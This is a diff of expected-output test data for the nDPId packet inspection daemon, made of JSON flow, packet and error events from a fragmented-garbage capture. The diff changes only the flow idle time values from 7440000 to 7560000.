+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5635,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244030168,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5635,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1534244030168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAi50Z2Z0Zz9HUj9HUj9zUj92mAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5636,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030168} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5636,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjc0ODM5NikoKiZeJSQjQCE="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5637,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030168} 
@@ -11894,8 +11894,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5946,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiVeJiooKSgqJl4lJCNAIyQ="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5947,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244030173} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":5947,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiVeJiooKiZe"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5948,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244030473,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1534244030473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiUkIyYqKEtJSkhHRkQyKiYtwwAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5948,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244030473,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1534244030473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiUkIyYqKEtJSkhHRkQyKiYtwwAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5949,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030473} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5949,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkRGR0hKSyZeJSQjI0VUUiU="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5950,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030473} 
@@ -12520,8 +12520,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6259,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAgAAAAAAAAAAAAAAAAAAAAA="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6260,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244030476} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":6260,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAgAAAAAAAAAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6261,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244030777,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6261,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1534244030777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjQyMTQ2MzE5ODIwNTEpKCpc2AAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6261,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244030777,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6261,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1534244030777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjQyMTQ2MzE5ODIwNTEpKCpc2AAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6262,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030777} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6262,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiZeJSQjQCMkJV4mKigqJl4="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6263,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030777} 
@@ -13146,8 +13146,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6572,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAnJzZGx1aGdrZmRzYmtudmM="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6573,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244030779} 00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":6573,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAi8udGdmdGc\/"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6574,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244031080,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6574,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1534244031080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkdSP0dSP3NSPzc0ODM5NinCaAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6574,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244031080,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6574,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1534244031080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkdSP0dSP3NSPzc0ODM5NinCaAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6575,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031080} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6575,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAigqJl4lJCNAIUAjJCVeJio="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6576,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031080} 
@@ -13772,8 +13772,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6885,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiomXiUkI0AjJCVeJiooKiY="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6886,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244031084} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":6886,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAl4lJCMmKihL"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6887,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244031384,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6887,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1534244031384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAklKSEdGRDIqJkRGR0hKSybhaQAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6887,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244031384,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6887,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1534244031384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAklKSEdGRDIqJkRGR0hKSybhaQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6888,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031384} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6888,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAl4lJCMjRVRSJVleVSZJKk8="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6889,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031384} 
@@ -14398,8 +14398,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7198,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAjpoZGZsa2RhPkw8TU5CSEc="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7199,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244031388} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7199,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkZERVcjQCQl"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7200,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244031688,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7200,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1534244031688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl5IQkdWCjQyMTQ2MzE5ODLvxgAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7200,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244031688,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7200,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1534244031688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl5IQkdWCjQyMTQ2MzE5ODLvxgAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7201,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031688} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7201,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjA1MSkoKiZeJSQjQCMkJV4="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7202,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031688} 
@@ -15024,8 +15024,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7511,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiomXiUkI3JzZGx1aGdrZmQ="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7512,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244031693} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7512,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAnNia252Yy8u"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7513,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244031993,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7513,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1534244031993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAnRnZnRnP0dSP0dSP3NSPzcd6AAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7513,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244031993,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7513,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1534244031993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAnRnZnRnP0dSP0dSP3NSPzcd6AAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7514,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031993} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7514,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjQ4Mzk2KSgqJl4lJCNAIUA="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7515,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031993} 
